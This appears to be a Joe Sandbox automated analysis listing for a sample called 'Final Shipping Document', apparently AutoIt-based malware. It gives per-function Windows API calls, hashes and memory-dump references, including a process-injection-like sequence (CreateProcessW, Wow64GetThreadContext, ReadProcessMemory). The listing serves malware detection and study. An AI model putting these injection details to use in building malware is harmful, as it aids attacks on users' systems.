                                                            Function 00BA10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BA1BF4
                                                              • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BA1BFC
                                                              • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BA1C07
                                                              • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BA1C12
                                                              • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BA1C1A
                                                              • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA1C22
                                                              • Part of subcall function 00BA1B4A: RegisterWindowMessageW.USER32(00000004,?,00BA12C4), ref: 00BA1BA2
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BA136A
                                                            • OleInitialize.OLE32 ref: 00BA1388
                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00BE24AB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID:
                                                            • API String ID: 1986988660-0
                                                            • Opcode ID: a73ad17772599971c84addfbf37854dc84273812ba7c463fdd01a7f40b64d0de
                                                            • Instruction ID: 2cac8da65eb89a586f56828bafc3c1507a904ce9666d110ab220d230a23cbbd1
                                                            • Opcode Fuzzy Hash: a73ad17772599971c84addfbf37854dc84273812ba7c463fdd01a7f40b64d0de
                                                            • Instruction Fuzzy Hash: A271AAB49253408ECBC8EF7DA88675D3AE4FB8935475D866AEC0ED72A1EB304484CF51
                                                            Function 00BA54C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00BA556D
                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00BA557D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 5e0fbbf403e02154aba11aace2cd734b236cb9634d27b3b687f428999d72bb8a
                                                            • Instruction ID: 33d72ecd36dcd5358663fbbe29fe6ff29523ed6510b5d883d4abda104001fc3a
                                                            • Opcode Fuzzy Hash: 5e0fbbf403e02154aba11aace2cd734b236cb9634d27b3b687f428999d72bb8a
                                                            • Instruction Fuzzy Hash: 59316C71A04A09EFDB24CF68C881B9DB7F6FB48714F14826AE91997240D771FE94CB90
                                                            Function 00BD86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00BD85CC,?,00C68CC8,0000000C), ref: 00BD8704
                                                            • GetLastError.KERNEL32(?,00BD85CC,?,00C68CC8,0000000C), ref: 00BD870E
                                                            • __dosmaperr.LIBCMT ref: 00BD8739
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                            • String ID:
                                                            • API String ID: 490808831-0
                                                            • Opcode ID: 89274544c349577dc0f5524533d1585e817b10497afe6766ae7ea02fd9c4c34d
                                                            • Instruction ID: ec4793a7e545bc96244883514d40a2ac4c2e1ce305a0253b7fc102a5f01456f4
                                                            • Opcode Fuzzy Hash: 89274544c349577dc0f5524533d1585e817b10497afe6766ae7ea02fd9c4c34d
                                                            • Instruction Fuzzy Hash: DB018E3660566026D27467346885B7EEBC9CB81776F3901DBF8199B3D2FEA0CC818254
                                                            Function 00C12FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00C12CD4,?,?,?,00000004,00000001), ref: 00C12FF2
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C13006
                                                            • CloseHandle.KERNEL32(00000000,?,00C12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C1300D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: fbcc368de16dc81a2d79be1a2fce99e801a517c56b8c789be36b779e882960ff
                                                            • Instruction ID: 68da2fbcbd2aab7459757291cd615752c7d2aa9bd922b47d1376cb45d29b52d4
                                                            • Opcode Fuzzy Hash: fbcc368de16dc81a2d79be1a2fce99e801a517c56b8c789be36b779e882960ff
                                                            • Instruction Fuzzy Hash: 61E0863229021077D6301755BC4DFCF3A5CD78AB75F104210F729750D046A0560163A8
                                                            Function 00BB1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __Init_thread_footer.LIBCMT ref: 00BB17F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID: CALL
                                                            • API String ID: 1385522511-4196123274
                                                            • Opcode ID: 1ae1e5b6502501796b956d1062982b81ba2b7719a61f6d9aae70e41f31d5d680
                                                            • Instruction ID: d2206001ee52aeda8c9ccada2d0c0104b1bd0ebb2f710cbc4ac630587cf6ad56
                                                            • Opcode Fuzzy Hash: 1ae1e5b6502501796b956d1062982b81ba2b7719a61f6d9aae70e41f31d5d680
                                                            • Instruction Fuzzy Hash: 36228B706082019FC714DF18C8A0ABABBF1FF95314F5489ADF9968B361D7B1E845CB92
                                                            Function 00C16EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00C16F6B
                                                              • Part of subcall function 00BA4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EFD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad_wcslen
                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                            • API String ID: 3312870042-2806939583
                                                            • Opcode ID: 9e313aedbf13bd1e7d1e1f4d8947b3022c2a119bfc969c1e85ff395aeefdcd8b
                                                            • Instruction ID: e1acfa9cd035f1a4253efcd85755e9f7ca2fa85a82bb7cba61cdba06d6f69971
                                                            • Opcode Fuzzy Hash: 9e313aedbf13bd1e7d1e1f4d8947b3022c2a119bfc969c1e85ff395aeefdcd8b
                                                            • Instruction Fuzzy Hash: B3B1743150C3019FCB14EF24C4919AEB7E5AF96310F14899DF496972A2DF30EE89DB92
                                                            Function 00BA2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00BE2C8C
                                                              • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                              • Part of subcall function 00BA2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BA2DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen
                                                            • String ID: X
                                                            • API String ID: 779396738-3081909835
                                                            • Opcode ID: 95a48a941a9b44382e9f4d7cc5b3478d86dab1a11104650d8ae828deadec7314
                                                            • Instruction ID: 25e8497650a6088b0e23833026a7cea828c51614985f02fd09bd3e5fbf24a12f
                                                            • Opcode Fuzzy Hash: 95a48a941a9b44382e9f4d7cc5b3478d86dab1a11104650d8ae828deadec7314
                                                            • Instruction Fuzzy Hash: 8921C371A04298AFDF01DF98C845BEE7BFCAF49304F004099E405A7241DFB45A898BA1
                                                            Function 00C12557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID: EA06
                                                            • API String ID: 2638373210-3962188686
                                                            • Opcode ID: 1ec30852932a1909770c0ca27b73835e75e20b0935543a353e0c1e9596c84ddc
                                                            • Instruction ID: fbc3b2428c30e001e9f92e21b891a5e0a9f9b0a937c4beffd151a606c6eabf56
                                                            • Opcode Fuzzy Hash: 1ec30852932a1909770c0ca27b73835e75e20b0935543a353e0c1e9596c84ddc
                                                            • Instruction Fuzzy Hash: 0101B172944258BEDF28C7A8C856FEEBBF8DB05301F00459EE1A2D21C1E5B4E718DB60
                                                            Function 00BDC9BB Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BD2D74: GetLastError.KERNEL32(?,?,00BD5686,00BE3CD6,?,00000000,?,00BD5B6A,?,?,?,?,?,00BCE6D1,?,00C68A48), ref: 00BD2D78
                                                              • Part of subcall function 00BD2D74: _free.LIBCMT ref: 00BD2DAB
                                                              • Part of subcall function 00BD2D74: SetLastError.KERNEL32(00000000,?,?,?,?,00BCE6D1,?,00C68A48,00000010,00BA4F4A,?,?,00000000,00BE3CD6), ref: 00BD2DEC
                                                              • Part of subcall function 00BD2D74: _abort.LIBCMT ref: 00BD2DF2
                                                              • Part of subcall function 00BDCADA: _abort.LIBCMT ref: 00BDCB0C
                                                              • Part of subcall function 00BDCADA: _free.LIBCMT ref: 00BDCB40
                                                              • Part of subcall function 00BDC74F: GetOEMCP.KERNEL32(00000000), ref: 00BDC77A
                                                            • _free.LIBCMT ref: 00BDCA33
                                                            • _free.LIBCMT ref: 00BDCA69
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            • Opcode ID: 1bb4c88eaebbc04dbeea5720815bb27cec2ced9482306c43811b9f6003d54ff7
                                                            • Instruction ID: 3c2182767b87e57cc53311f0dfeec5e3272a809ac22bc2f84a3dc0356add0d84
                                                            • Opcode Fuzzy Hash: 1bb4c88eaebbc04dbeea5720815bb27cec2ced9482306c43811b9f6003d54ff7
                                                            • Instruction Fuzzy Hash: 0531AF3190424AAFDB11EBA9D481BADFBE5EF40320F2101DBE8049B3A2FB759D41DB50
                                                            Function 00BA3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BA3908
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: e5294b711335830ae6edf8ba7b56f8ba19ef613aa348b5bd11b717eb82caa924
                                                            • Instruction ID: 482c60d15a651786e3b34ed22cef15ae6a24dc605c04558e35e47cc61eb40df8
                                                            • Opcode Fuzzy Hash: e5294b711335830ae6edf8ba7b56f8ba19ef613aa348b5bd11b717eb82caa924
                                                            • Instruction Fuzzy Hash: 1E31A570508301DFD720DF24D88579BBBE8FB4AB08F04096EF99A93250E775AA44CB52
                                                            Function 00BA5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00BA949C,?,00008000), ref: 00BA5773
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00BA949C,?,00008000), ref: 00BE4052
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 0a303f8f3dcd6b5e092387cf10bd4301f2acae67242518e11bdb325694d0de68
                                                            • Instruction ID: bf1bfa340039808c59cde64d71eba973d2a55c605bf283d96eabdb58cccce3c2
                                                            • Opcode Fuzzy Hash: 0a303f8f3dcd6b5e092387cf10bd4301f2acae67242518e11bdb325694d0de68
                                                            • Instruction Fuzzy Hash: 80019230145225B6E7310A2ACC4EF9B7F98EF027B0F108350BA9C6A1E1CBB45954DB90
                                                            Function 00BA6E14 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00BA9879,?,?,?), ref: 00BA6E33
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00BA9879,?,?,?), ref: 00BA6E69
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide
                                                            • String ID:
                                                            • API String ID: 626452242-0
                                                            • Opcode ID: bedabde901fcac1cbfe99708e899c4d34ef887c7fa9bd15d002f42c0396992af
                                                            • Instruction ID: 096b20cbfeba8065545e9c40ae18b4705fdab39f97b8cb6efd01351fbf014e64
                                                            • Opcode Fuzzy Hash: bedabde901fcac1cbfe99708e899c4d34ef887c7fa9bd15d002f42c0396992af
                                                            • Instruction Fuzzy Hash: 3001D4713042007FEB196BB99C4BFBF7AEDDB85300F14007DB106DA1E1E9A0AC009630
                                                            Function 00BAB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __Init_thread_footer.LIBCMT ref: 00BABB4E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            • Opcode ID: 7537579fdb9c84bd2abfc64b84f61ab911e0248d37b50bc95962ab15e50a9805
                                                            • Instruction ID: 74c19c669a48111007ee22fb4f9ca87e4cb4d491bc380a68d5d3dc17fcdfd8b0
                                                            • Opcode Fuzzy Hash: 7537579fdb9c84bd2abfc64b84f61ab911e0248d37b50bc95962ab15e50a9805
                                                            • Instruction Fuzzy Hash: 4932AD34A082099FDB10DF54C894FBEB7F9EF46310F148099EA25AB262D774ED85CB61
                                                            Function 0157129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01571A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01571AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01571B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2039525570.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1570000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                            • Instruction ID: 3c57e2ca2d2cbbd8f23e480fd92c8114db82908695af9f372885af9a25fe94b5
                                                            • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                            • Instruction Fuzzy Hash: F312DD24E24658C6EB24DF64D8507DEB232FF68300F1094E9910DEB7A5E77A4F81CB5A
                                                            Function 00BA4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E9C
                                                              • Part of subcall function 00BA4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BA4EAE
                                                              • Part of subcall function 00BA4E90: FreeLibrary.KERNEL32(00000000,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EC0
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EFD
                                                              • Part of subcall function 00BA4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E62
                                                              • Part of subcall function 00BA4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BA4E74
                                                              • Part of subcall function 00BA4E59: FreeLibrary.KERNEL32(00000000,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E87
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressFreeProc
                                                            • String ID:
                                                            • API String ID: 2632591731-0
                                                            • Opcode ID: 9335f787675ea644e025526f3b651b90fbab8db183f0c7752fabe467f171b803
                                                            • Instruction ID: 8e6407d895ed4c02fcbd2f57bb7480d1008f0a7fafd578079af00bfac09529d9
                                                            • Opcode Fuzzy Hash: 9335f787675ea644e025526f3b651b90fbab8db183f0c7752fabe467f171b803
                                                            • Instruction Fuzzy Hash: 46110132618205AACB24AB60DC42FED77E4AF81B10F2084ADF456B61C1EFB1EA049750
                                                            Function 00BD8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
